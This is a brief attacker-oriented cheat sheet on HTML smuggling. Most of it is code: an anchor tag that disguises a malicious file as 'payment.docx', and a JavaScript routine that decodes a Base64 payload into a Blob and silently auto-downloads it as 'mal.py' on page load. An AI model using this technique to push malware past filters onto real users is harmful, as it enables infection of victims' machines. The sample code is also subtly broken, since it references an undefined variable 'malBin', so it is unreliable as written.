HTML Smuggling
Last modified: 2023-07-26
Attackers hosts a malicious file and can invite victim to download it using the HTML Smuggling technique.
Exploitation
Attackers can use anchor
tag to invite victim to download a malicious file as below. When clicking, the malicious file is downloaded as the name “payment.docx”.
<a href="/malicious_doc.docx" download="payment.docx">Cliek Here</a>
Alternatively, attackers can also use JavaScript, then let browsers to download a malicious file when loading the page, or invite victim to click download button.
var a = document.createElement('a');
a.download = 'malicious_doc.docx'
Using JavaScript Blob
By using blob, attackers can let victim to download a malicious file while obfuscate its content by encoding/decoding malicious code.
// Decode Base64 encoded malicious code
var malBase64 = '<BASE64_ENCODED_CODE>';
var malBinStr = window.atob(malBase64);
var malLen = malBinStr.length;
var malBytes = new Uint8Array(malLen);
for (var i = 0; i < malLen; i++) {
malBytes[i] = malBin.charCodeAt(i);
}
// Create a blob
// 'octet/stream' allows any file types.
var malBlob = new Blob([malBytes.buffer], {type: 'octet/stream'});
var malUrl = window.URL.createObjectURL(malBlob);
// Create a downloadable anchor (automatically download)
var a = document.createElement('a');
a.style.display = 'none';
a.href = malUrl;
a.download = 'mal.py';
document.body.appendChild(a);
// this anchor will be clicked automatically.
a.click();
document.body.removeChild(a);